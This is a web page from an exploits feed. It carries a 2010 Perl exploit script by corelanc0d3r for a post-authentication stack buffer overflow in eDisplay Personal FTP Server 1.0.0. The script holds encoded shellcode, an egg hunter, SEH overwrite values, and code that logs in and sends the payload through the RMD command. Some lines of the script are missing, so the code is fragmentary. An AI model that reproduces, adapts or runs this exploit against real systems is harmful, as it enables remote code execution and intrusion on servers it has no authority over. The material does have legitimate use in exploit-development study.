|
Feeds -
Exploits
|
|
Written by corelanc0d3r
|
|
Sunday, 21 March 2010 11:26 |
# Exploit Title : eDisplay Personal FTP server 1.0.0 Multiple Post-Authentication Stack BOF| # Type of sploit: Remote Code Execution |
| # Bug found by : loneferret (march 19, 2010) |
| # Reference : http://www.exploit-db.com/exploits/11810 |
| # Exploit date : March 20, 2010 |
| # Tested on : XP SP3 En (VirtualBox) |
| # Greetz to : loneferret, dookie2000ca and of course my friends at Corelan Security Team |
| # http://www.corelan.be:8800/index.php/security/corelan-team-members/ |
| # ---------------------------------------------------------------------------------------------------- |
| # Script provided 'as is', without any warranty. |
| # Use for educational purposes only. |
| # Do not use this code to do anything illegal ! |
| # Note : you are not allowed to edit/modify this code. |
| # If you do, Corelan cannot be held responsible for any damages this may cause. |
| # ---------------------------------------------------------------------------------------------------- |
| # Before we begin : if you liked my quickzip.exe exploit |
| # then you will certainly love this one too :-) |
| # ---------------------------------------------------------------------------------------------------- |
| print "|------------------------------------------------------------------|\n"; |
| print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |\n"; |
| print "| / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n"; |
| print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\n"; |
| print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/ |\n"; |
| print "| http://www.corelan.be:8800 |\n"; |
| print "|-------------------------------------------------[ EIP Hunters ]--|\n\n"; |
| print " --==[ Exploit for eDisplay Personal FTP Server 1.0.0]==-- \n"; |
| print " Author : corelanc0d3r\n\n"; |
| print " usage: $0 <targetip> <targetport> <user> <password>\n"; |
| print " [+] Preparing payload\n"; |
| #basereg edi - custom MessageBox payload |
| "WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABX". |
| "P8ABuJIn98kMKn9QdEtJTTqzrNRcJUaXI54lKBQfPLKPv". |
| "VlnkqfGlLKW6THLKQngPlKP6FXpOtXD5ZSryeQ8QKO8aa". |
| "pLKPlututNkW5WLLKSdUUcHS1yznk3zvxlK1J5pwqxkZC". |
| "P7qYLKP4NkFa8ndqkOUayPkLNLNdKppt4JJaXOTMfaJgI". |
| "yxqKOKOKO7KSLwT6HPuINNkcjGTuQzKBFLK6lpKNkcj7l". |
| "faJKLKVdLKC1KXk9QTEtULSQksnRtHwYXTk9kUOyKrCXl". |
| "NpNfnxl62kXOlKOio9ok9ReUTMk3NiHKR3CowuLUtPRjH". |
| "LKKOkOiooyW5WxCXrLBLQ0KOqxFSWBVNCTU8qeT3CUT2M". |
| "XclvD6joyivQFKOsevdoyYRRpOKoXLbPMMlOw5LDdrrjH". |
| "qNKO9o9oPhTn6NfNV8phdp0dEcSBU8BLCQrNcSqxPcrOR". |
| "RSUtqKkmX1LTdtONiysrHTnVNqHUp3Xq0gK4i6N3XBGSQ". |
| "1ypnphSYsDUppaQxsTqycTEpTqxImXPLtdFrMYkQP1Zrs". |
| "b3cPQrrkOn0DqIPbpKOQEeXA"; |
| #custom encoded egg hunter |
| #boy I love pvefindaddr ! |
| # !pvefindaddr encode ascii <bytes> |
| #I only had to fix bad chars |
| #but we need 5C to trigger SEH at correct offset |
| "\x2D\x70\x2D\x5C\x6F". #we need these 5C's !! |
| "\x2D\x70\x2C\x5C\x6F". #we need these 5C's !! |
| "\x75\x58"; #jump to decoded opcode |
| my $nseh= "\x61\x42\x42\x42"; |
| my $seh=pack('V',0x202D2B3C); #comctl32.ocx 0x202D2B3C |
| #encoded jumpback code to jump to encoded egg hunter |
| $jumpback=$jumpback."\x25\x4A\x4D\x4E\x55". |
| my $rest = "A" x (1000 - length($buffer.$nseh.$seh.$decoder.$pad.$sc.$jumpback)-20-5); |
| my $aligneax="\x52\x58\x2d\x35\x55\x55\x55\x2d\x35\x55\x55\x55\x2d\x35\x55\x55\x55"; |
| my $payload=$buffer."CCCCCCCCCCCCCCCCCC".$decoder.$pad.$nseh.$seh."BBB".$aligneax.$jumpback.$rest.$sc; |
| print " [+] Connecting to server $ARGV[0] on port $ARGV[1]\n"; |
| $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], |
| $ftp = <$sock> || die " [!] *** Unable to connect ***\n"; |
| print " [+] Logging in (user $user)\n"; |
| print $sock "USER $user\r\n"; |
| print $sock "PASS $pass\r\n"; |
| print " [+] Sending payload (" . length($payload)." bytes)\n"; |
| print $sock "RMD ".$payload."\r\r\n"; |
| print " [+] Shellcode size : " . length($sc)." bytes\n"; |
|
